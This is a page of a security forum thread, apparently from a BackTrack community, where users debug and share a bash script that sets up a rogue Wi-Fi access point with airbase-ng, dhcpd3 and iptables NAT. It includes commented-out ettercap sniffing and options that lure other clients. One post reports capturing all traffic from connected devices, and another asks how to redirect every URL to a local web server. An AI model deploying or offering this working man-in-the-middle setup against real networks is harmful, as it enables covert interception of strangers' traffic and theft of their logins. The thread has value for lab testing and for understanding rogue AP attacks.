Page 14 of 14 FirstFirst ... 4121314
Results 131 to 137 of 137

Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #131
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Crap pastebin is down and I don't have the script XD yeah i know.. backup well I didnt :P .. Working on my Jasager on Fonera+ and successfully got ettercap installed on it. But I forgot how the heck I got ettercap working the way I want it to.

    Would anyone mind providing me with the script if they have it somewhere?
    edit: It's back up again, phew ...
    - Poul Wittig

  2. #132
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default Speed

    As a lot of you know Badkarma has written a wicket rouge AP with Karma functionality that uses ettercap for packet capture and manipulation. It is not only vary well written but made for BT4. Seems all his apps are for BT4 now...

    http://www.darkoperator.com/tools-and-scripts/

    The P C 60 seem to work fine etc. I have tried more or less every softAP out there, but they all seem to suffer from one detail. They are slow. I am not to sure if fragmentation is the whole story. Has ANYBODY had a rougeAP working that runs really well? If so what wifi card/s are you using?

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  3. #133
    Just burned his ISO
    Join Date
    May 2009
    Posts
    21

    Default

    I can't get the internet access on the rogue AP to work at all. I have modded the script slightly to make it work with dhcpd3 on BT4. I'm using BT4 in VMWare with Alfa USB and wired ethernet. Also modded it so it does not use the -p -c flags to interfere with other clients or AP's, and also removed ettercap for now while I try to get it to work.

    The client gets through the full DHCP cycle, discover, offer, request, ack. Clients gets an IP. I can see in Wireshark that the doman names are resolving successfully, but no internet access. Tried using MTU 1500 and 1400. Also checked I have internet access in BT4 by doing wget. Here's the modded script:

    Code:
    ##!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    #konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
    
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    #konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    Any ideas?

  4. #134
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Default

    same problem here, i can connect to my access point, but not to the internet. i have used your modified code.
    (p.s. does anybody know how to rewrite it, to forward all urls to an apache webserver running on the the same machine like the access point?)

  5. #135
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    5

    Default

    same here :S waiting for solution ... searching to solve this ..

  6. #136
    Junior Member cyberconsole's Avatar
    Join Date
    Aug 2007
    Posts
    57

    Default

    This worked perfectly. Thanks! Very well explained. cudos
    There's no fate but what we make for ourselves.

    -I already know I cant spel-

  7. #137
    Just burned his ISO
    Join Date
    May 2009
    Posts
    21

    Default

    I've finally got this working after a long while. My setup is as follows:

    Vista laptop running BT4-Beta in VMWare Player
    Internet source is a wireless connection using the on board laptop wifi card, to my Netgear DG834GT router.
    Using the Alfa USB wifi adapter for creating the AP.

    Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.

    Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients aka illegal). If you want that on then uncomment and comment the relevant lines.
    I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed, you can try it though, just uncomment the line.
    Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces - I got sick of typing wlan0 and eth0 everytime I ran the script. It only asks for the AP SSID, the two interfaces are hard coded as wlan0 for the Alfa, and eth0 for the Internet source (even though my Internet source is wireless not ethernet).

    This is running very fast from the client's point of view, I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.

    Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:

    Code:
    /etc/init.d/networking start
    Then I do a quick test using wget to verify that my internet connection is available to BT.:

    Code:
    wget google.com

    Modified script for BT4-Beta:
    Code:
    #!/bin/bash
    
    # The iface inputs are commented out and hard coded, to save having to type them everytime the script is executed
    #echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    #read -e IFACE
    #echo -n "Enter your wireless interface name, for example wlan0: "
    #read -e WIFACE
    
    # here I have hard coded the two interfaces, change them if yours are different
    IFACE=eth0
    WIFACE=wlan0
    
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    # Below is the safe airbase command which does not use the evil options
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    # The line below is commented out, it uses the evil options -P and -C
    #konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    # Below ettercap is commented out, just remove the # if you want it on
    #konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.

Page 14 of 14 FirstFirst ... 4121314

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •